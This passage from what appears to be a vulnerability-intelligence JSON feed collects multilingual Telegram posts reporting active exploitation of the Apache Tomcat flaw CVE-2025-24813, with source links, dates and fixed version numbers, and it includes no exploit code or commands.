"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/CyberSecurityIL/67640", "content": "\u05e9\u05d9\u05de\u05d5 \u05dc\u05d1 - \u05d7\u05d5\u05dc\u05e9\u05d4 \u05e7\u05e8\u05d9\u05d8\u05d9\u05ea \u05d1-Apache Tomcat \u05de\u05e0\u05d5\u05e6\u05dc\u05ea \u05d1\u05e4\u05d5\u05e2\u05dc \u05e2\u05dc \u05d9\u05d3\u05d9 \u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05de\u05e1\u05d1\u05d9\u05d1 \u05dc\u05e2\u05d5\u05dc\u05dd.\n\n\u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 CVE-2025-24813, \u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05dc\u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05dc\u05d4\u05e8\u05d9\u05e5 \u05e7\u05d5\u05d3 \u05de\u05e8\u05d7\u05d5\u05e7 \u05d1\u05d0\u05de\u05e6\u05e2\u05d5\u05ea \u05e9\u05dc\u05d9\u05d7\u05ea \u05d1\u05e7\u05e9\u05d5\u05ea \u05dc\u05e9\u05e8\u05ea \u05d2\u05dd \u05dc\u05dc\u05d0 \u05d4\u05d6\u05d3\u05d4\u05d5\u05ea.\n\n\u05e4\u05e8\u05d8\u05d9\u05dd \u05e0\u05d5\u05e1\u05e4\u05d9\u05dd - \u05db\u05d0\u05df.\n\n\u05ea\u05d9\u05e7\u05d5\u05df \u05e4\u05d5\u05e8\u05e1\u05dd \u05d1\u05d2\u05e8\u05e1\u05d0\u05d5\u05ea 11.0.3+, 10.1.35+, \u05d0\u05d5 9.0.99+\n\nhttps://t.me/CyberSecurityIL/6815\n\n#\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea", "creation_timestamp": "2025-03-17T15:15:09.000000Z"}, {"uuid": "2a9b8e2e-b406-4fb1-8a61-1a6465ce3e0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/jj_8tl/214", "content": "\ud83d\udea8 CVE-2025-24813 Alert: Critical Apache Tomcat RCE via partial PUT disclosed on Mar 10. GreyNoise detects 4 IPs exploiting it since Mar 17. Vulnerable systems risk arbitrary code execution. Check your exposure with my all-in-one query for internet-facing Tomcat instances.\n\n\u2728 Shared via Awham AutoFeed \u2728\nChannel: @jj_8tl", "creation_timestamp": "2025-04-11T12:09:21.000000Z"}, {"uuid": "eac1871f-b8ed-4dd3-bdb8-5b9447239adf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/Y0mc5TFNJrxhbvKjJ92dfl8Dj2YpEf0hf49nP_pBnkyKv20", "content": "", "creation_timestamp": "2025-03-17T13:23:45.000000Z"}, {"uuid": "788a3e51-1b22-4d39-9463-5541abcac7b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/xakep_ru/17254", "content": "\u0421\u0432\u0435\u0436\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Apache Tomcat \u0443\u0436\u0435 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0430\u0435\u0442\u0441\u044f \u0430\u0442\u0430\u043a\u0430\u043c\n\n\u0414\u043b\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 (RCE) \u0432 Apache Tomcat, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0435\u0439 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2025-24813, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442, \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u0439, \u043a\u0430\u043a \u0432\u0437\u043b\u0430\u043c\u044b\u0432\u0430\u0442\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u0434\u043d\u043e\u0433\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430 PUT. \u0418\u0437-\u0437\u0430 \u044d\u0442\u043e\u0433\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0436\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438.\n\nhttps://xakep.ru/2025/03/18/apache-tomcat-rce-attacks/", "creation_timestamp": "2025-03-18T15:39:13.000000Z"}, {"uuid": "cabe2d9a-8422-4fc8-9dc3-b1c274736b6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/thehackernews/6503", "content": "\ud83d\udea8 Apache Tomcat Under Attack.\n\nHackers are actively exploiting CVE-2025-24813 just 30 hours after disclosure.\n\n\ud83d\udd39 RCE &amp; Info Disclosure Risk\n\ud83d\udd39 No Authentication Needed\n\ud83d\udd39 Attackers Upload &amp; Execute Malicious Files\n\n\u26a0\ufe0f Delaying could mean backdoors, config tampering &amp; full compromise.\n\nRead: https://thehackernews.com/2025/03/apache-tomcat-vulnerability-comes-under.html\n\nDon\u2019t wait\u2014secure your systems NOW", "creation_timestamp": "2025-03-17T18:11:27.000000Z"}, {"uuid": "60a9f2b6-7e3d-4f36-976d-f0016f677c58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/11924", "content": "#exploit\n1. CVE-2025-27636, CVE-2025-29891:\nApache Camel RCE PoC/Detection\n\n2. CVE-2024-0760:\nDoS in ISC BIND DNS\n\n3. CVE-2025-24813:\nApache Tomcat RCE\n\n4. CVE-2015-0009:\nSMB Security Feature Bypass (SMB Signing)\n\n5. CVE-2024-0582, CVE-2024-35880:\nA Series of io_uring pbuf Vulnerabilities", "creation_timestamp": "2025-03-13T23:40:19.000000Z"}, {"uuid": "d264e7fa-29db-4d6e-bf16-f9f8b32749f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/kasraone_com/777", "content": "\ud83d\udea8CVE-2025-24813 \n\nApache Tomcat RCE PoC\n\na Remote Code Execution (RCE) vulnerability in Apache Tomcat\n\n\n         \u2661 \u2800\u2800 \u3007\u2800  \u2800 \u2399\u2800\u200c  \u200c \u2332\u2063 \n         \u02e1\u2071\u1d4f\u1d49  \u1d9c\u1d52\u1d50\u1d50\u1d49\u207f\u1d57   \u02e2\u1d43\u1d5b\u1d49  \u02e2\u02b0\u1d43\u02b3\u1d49\n\n                        K1\n                  kasraone", "creation_timestamp": "2025-06-05T08:26:00.000000Z"}]}